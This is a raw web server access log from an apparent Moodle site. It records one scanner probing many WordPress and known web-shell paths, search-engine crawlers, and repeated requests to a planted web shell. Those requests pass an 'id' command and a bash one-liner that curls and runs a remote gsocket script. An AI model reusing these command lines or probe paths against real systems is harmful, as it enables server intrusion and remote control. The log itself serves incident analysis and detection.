52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /wp-activate.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /wp-admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:50 +0300] "GET /wp-admin/6myKRCf7pkL.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/axcjwclf.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/classwithtostring.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/HaUaphPh.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/blue/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/blue/blkabtfa.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/blue/blue.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/blue/xmrlpc.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/fridSiB.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/colors/midnight/colors.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/imdnbpma.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/lock.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/css/network.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/images/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/images/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/images/cloud.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/images/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/includes/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/includes/class-walker-nav-edit.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/js/QXUho.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/js/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/js/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/js/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/js/widgets/about.php7 HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:51 +0300] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/maint/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/network/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/network/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/options.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/pages.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/user/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/user/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/user/xmrlpc.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/users.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-admin/x.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-back.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-commentin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-config-sample.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-configs.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-conflg.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content//autoload_classmap.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/;k.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/install.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/languages/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/languages/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/plugins/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/plugins/content-management/content.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:52 +0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/elementor/elementor-merge.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/fix/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/linkpreview/custom-plugin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/simple/simple.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/plugins/xt/ HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/radio.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/seotheme/custom-plugin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/sky-pro/js.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/themes/twentytwenty/functions.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/upgrade/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/ HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/2024/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/classwithtostring.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/cong.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/file.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-cron.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-includes/IXR/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-includes/IXR/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:53 +0300] "GET /wp-includes/Requests/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/Requests/chosen.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/Requests/sxo.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/SimplePie/gzdecodes.php.suspected HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/Text/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/Text/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/assets/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/block-patterns/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/blocks/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/buy.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/css/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/customize/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/customize/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/dkmjxfdu.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/images/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/images/smilies/dVSRAByORS.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/images/sxo.php HTTP/1.1" 404 796 "-" "-"
103.65.236.215 - - [13/Apr/2025:21:53:47 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:22:31:24 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [13/Apr/2025:22:31:32 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.191.45.212 - - [13/Apr/2025:22:53:32 +0300] "GET / HTTP/1.1" 303 743 "http://distance.gluk.ac.ke/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
20.191.45.212 - - [13/Apr/2025:22:53:34 +0300] "GET /favicon.ico HTTP/1.1" 404 796 "http://distance.gluk.ac.ke/favicon.ico" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
49.51.33.159 - - [13/Apr/2025:23:41:10 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/images/wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/js/plupload/wp-admin.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/js/tinymce/plugins/compat3x/css/ HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/mtnidwgu.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/pomo/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/rest-api/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/sitemaps/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/index.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:54 +0300] "GET /wp-includes/widgets/about.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-includes/wp-includes_function.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-load.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-login.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-login.php?action=register HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-mail.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-signup.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp-trackback.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wp.php HTTP/1.1" 200 0 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /ws.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wso.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /wso112233.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /x.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /xl.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /xleetshell.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /xmlrpc.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /xx.php HTTP/1.1" 404 796 "-" "-"
52.164.123.168 - - [13/Apr/2025:22:32:55 +0300] "GET /yanz.php HTTP/1.1" 404 796 "-" "-"
18.118.218.78 - - [13/Apr/2025:23:08:11 +0300] "GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1" 404 796 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.66.20 - - [14/Apr/2025:01:05:28 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.65.236.215 - - [14/Apr/2025:01:47:51 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:01:47:52 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:01:48:06 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
66.249.66.19 - - [14/Apr/2025:01:05:28 +0300] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:01:20:36 +0300] "GET /ads.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.65.236.215 - - [14/Apr/2025:01:47:55 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
51.8.102.251 - - [14/Apr/2025:02:17:03 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
194.38.23.16 - - [14/Apr/2025:02:24:54 +0300] "GET /sites/all/libraries/elfinder/connectors/php/connector.php HTTP/1.1" 404 796 "-" "ALittle Client"
103.65.236.215 - - [14/Apr/2025:02:37:14 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:37:14 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:37:19 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:37:26 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:53:07 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:53:08 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:53:11 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:02:53:18 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:26 +0300] "GET /wordpress HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:30 +0300] "GET /distance HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:36 +0300] "GET /wordpress HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:39 +0300] "GET /old HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:54 +0300] "GET /wp HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:54 +0300] "GET /temp HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:10 +0300] "GET / HTTP/1.1" 303 743 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:19 +0300] "GET /wp HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
